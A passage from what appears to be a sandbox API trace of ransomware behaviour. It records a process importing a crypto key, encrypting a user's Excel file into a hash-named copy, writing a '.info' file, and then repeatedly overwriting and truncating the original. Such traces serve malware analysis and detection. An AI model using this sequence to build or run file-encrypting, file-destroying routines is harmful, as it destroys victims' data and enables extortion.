pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.649] CryptImportKey (in: hProv=0x1a5b7c10, pbData=0x22a3e40, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626b40) returned 1 [0075.649] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.649] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.649] CryptDuplicateKey (in: hKey=0x1a626b40, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626d00) returned 1 [0075.649] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.650] CryptSetKeyParam (hKey=0x1a626d00, dwParam=0x4, pbData=0x22a3f88*=0x1, dwFlags=0x0) returned 1 [0075.650] CryptSetKeyParam (hKey=0x1a626d00, dwParam=0x1, pbData=0x22a3f38, dwFlags=0x0) returned 1 [0075.650] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0075.650] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0075.650] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", lpFilePart=0x0) returned 0x3d [0075.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.650] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uhqm 5er-b2iqjm_m.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.650] GetFileType (hFile=0x36c) returned 0x1 [0075.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.650] GetFileType (hFile=0x36c) returned 0x1 [0075.650] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B", lpFilePart=0x0) returned 0x48 [0075.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.650] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4e6d6c583ea757e12dc3003df792811b"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x358 [0075.650] GetFileType (hFile=0x358) returned 0x1 [0075.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.651] GetFileType (hFile=0x358) returned 0x1 [0075.651] ReadFile (in: hFile=0x36c, lpBuffer=0x22a4358, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x22a4358*, lpNumberOfBytesRead=0x1bf5da28*=0xf881, lpOverlapped=0x0) returned 1 [0075.652] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22b8370*, pdwDataLen=0x1bf5da80*=0xf880, dwBufLen=0xf880 | out: pbData=0x22b8370*, pdwDataLen=0x1bf5da80*=0xf880) returned 1 [0075.652] WriteFile (in: hFile=0x358, lpBuffer=0x22b8370*, nNumberOfBytesToWrite=0xf880, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x22b8370*, lpNumberOfBytesWritten=0x1bf5da18*=0xf880, lpOverlapped=0x0) returned 1 [0075.654] ReadFile (in: hFile=0x36c, lpBuffer=0x22a4358, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x22a4358*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0075.654] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22c7c30*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x22c7c30*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.654] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22c7c80*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x22c7c80*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.654] WriteFile (in: hFile=0x358, lpBuffer=0x22c7cd0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x22c7cd0*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0075.654] CloseHandle (hObject=0x358) returned 1 [0075.656] CloseHandle (hObject=0x36c) returned 1 [0075.656] CryptDestroyKey (hKey=0x4ce9f0) returned 1 [0075.656] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0075.656] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0075.656] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B", lpFilePart=0x0) returned 0x48 [0075.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0075.656] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4e6d6c583ea757e12dc3003df792811b"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.656] GetFileType (hFile=0x36c) returned 0x1 [0075.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0075.656] GetFileType (hFile=0x36c) returned 0x1 [0075.656] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.657] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.658] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.660] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.661] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.661] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.661] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.661] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.661] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.661] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.662] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.662] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.662] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.662] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.662] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.662] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x890, lpOverlapped=0x0) returned 1 [0075.662] ReadFile (in: hFile=0x36c, lpBuffer=0x22c93c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22c93c8*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0075.662] CloseHandle (hObject=0x36c) returned 1 [0075.664] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B.info", lpFilePart=0x0) returned 0x4d [0075.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0075.664] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4E6D6C583EA757E12DC3003DF792811B.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4e6d6c583ea757e12dc3003df792811b.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.664] GetFileType (hFile=0x36c) returned 0x1 [0075.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0075.664] GetFileType (hFile=0x36c) returned 0x1 [0075.665] WriteFile (in: hFile=0x36c, lpBuffer=0x22d5a88*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x22d5a88*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0075.665] CloseHandle (hObject=0x36c) returned 1 [0075.666] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", lpFilePart=0x0) returned 0x3d [0075.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0075.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uhqm 5er-b2iqjm_m.xls"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4244dd80, ftCreationTime.dwHighDateTime=0x1d4cdae, ftLastAccessTime.dwLowDateTime=0x4fea7030, ftLastAccessTime.dwHighDateTime=0x1d4c89a, ftLastWriteTime.dwLowDateTime=0x4fea7030, ftLastWriteTime.dwHighDateTime=0x1d4c89a, nFileSizeHigh=0x0, nFileSizeLow=0xf881)) returned 1 [0075.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0075.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", lpFilePart=0x0) returned 0x3d [0075.667] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", dwFileAttributes=0x80) returned 1 [0075.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", lpFilePart=0x0) returned 0x3d [0075.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0075.667] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uhqm 5er-b2iqjm_m.xls"), fInfoLevelId=0x0, lpFileInformation=0x22dd690 | out: lpFileInformation=0x22dd690*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4244dd80, ftCreationTime.dwHighDateTime=0x1d4cdae, ftLastAccessTime.dwLowDateTime=0x4fea7030, ftLastAccessTime.dwHighDateTime=0x1d4c89a, ftLastWriteTime.dwLowDateTime=0x4fea7030, ftLastWriteTime.dwHighDateTime=0x1d4c89a, nFileSizeHigh=0x0, nFileSizeLow=0xf881)) returned 1 [0075.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0075.667] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls", lpFilePart=0x0) returned 0x3d [0075.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0075.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 5ER-b2IqJm_M.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uhqm 5er-b2iqjm_m.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.667] GetFileType (hFile=0x36c) returned 0x1 [0075.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0075.667] GetFileType (hFile=0x36c) returned 0x1 [0075.668] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.668] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.669] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.670] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.671] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.671] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.672] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.673] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.674] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.674] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.690] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.691] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.691] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.692] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.693] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.694] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.694] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5daa8*=0xa00, lpOverlapped=0x0) returned 1 [0075.694] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.695] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.696] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.697] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.697] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.698] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.699] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.700] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.700] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.701] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.702] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.702] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.703] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.704] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.705] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.705] WriteFile (in: hFile=0x36c, lpBuffer=0x22ddb58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x22ddb58*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.708] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.709] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.709] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.709] SetEndOfFile (hFile=0x36c) returned 1 [0075.719] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0075.719] CloseHandle (hObject=0x36c) returned 1 [0075.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uHqM 